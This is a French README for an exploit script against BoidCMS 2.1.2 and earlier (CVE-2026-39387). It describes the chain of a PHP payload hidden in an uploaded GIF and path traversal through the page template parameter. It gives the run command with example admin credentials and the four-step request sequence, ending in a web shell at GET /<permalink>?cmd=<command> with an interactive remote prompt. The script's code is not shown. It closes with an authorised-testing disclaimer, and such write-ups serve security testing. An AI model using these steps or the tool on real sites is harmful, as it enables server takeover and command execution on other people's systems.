
Exploit RCE BoidCMS <= 2.1.2
BoidCMS <= 2.1.2 permet à un attaquant authentifié d'obtenir une exécution de code à distance (RCE) en combinant deux faiblesses :
image/gif) sans valider le contenu réel des fichiers, permettant à du code PHP intégré dans un fichier GIF d'être stocké sur le serveur.tpl contrôlé par l'utilisateur, résolu par rapport au répertoire des thèmes sans assainissement, permettant une traversée de chemin (par ex. ../../media/shell.gif) pour pointer le template d'une page vers le fichier téléversé.Lorsque la page malveillante est rendue, l'interpréteur PHP exécute la charge utile intégrée.
| Champ | Valeur |
|---|
| Logiciel | BoidCMS |
| Versions | <= 2.1.2 |
| CVE | CVE-2026-39387 |
python3 CVE-2026-39387.py -u <target_url> -l <username> -p <password>
| Option | Description | Exemple |
|---|---|---|
-u, --url | URL de base du site BoidCMS cible | http://target.com |
-l, --user | Nom d'utilisateur administrateur | admin |
-p, --passwd | Mot de passe administrateur | password123 |
python3 CVE-2026-39387.py -u http://target.com -l admin -p password123
Une fois l'exploit terminé, une invite de shell interactive (cmd >>) est fournie pour exécuter des commandes sur l'hôte distant.
1. Login → POST /admin (with CSRF token)
2. Upload shell → POST /admin?page=media (shell.gif containing PHP payload)
3. Create page → POST /admin?page=create (tpl=../../media/shell.gif)
4. Execute shell → GET /<permalink>?cmd=<command>
pip install requests
Cet exploit est fourni à des fins éducatives et pour des tests de sécurité autorisés uniquement. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester est illégale et contraire à l'éthique.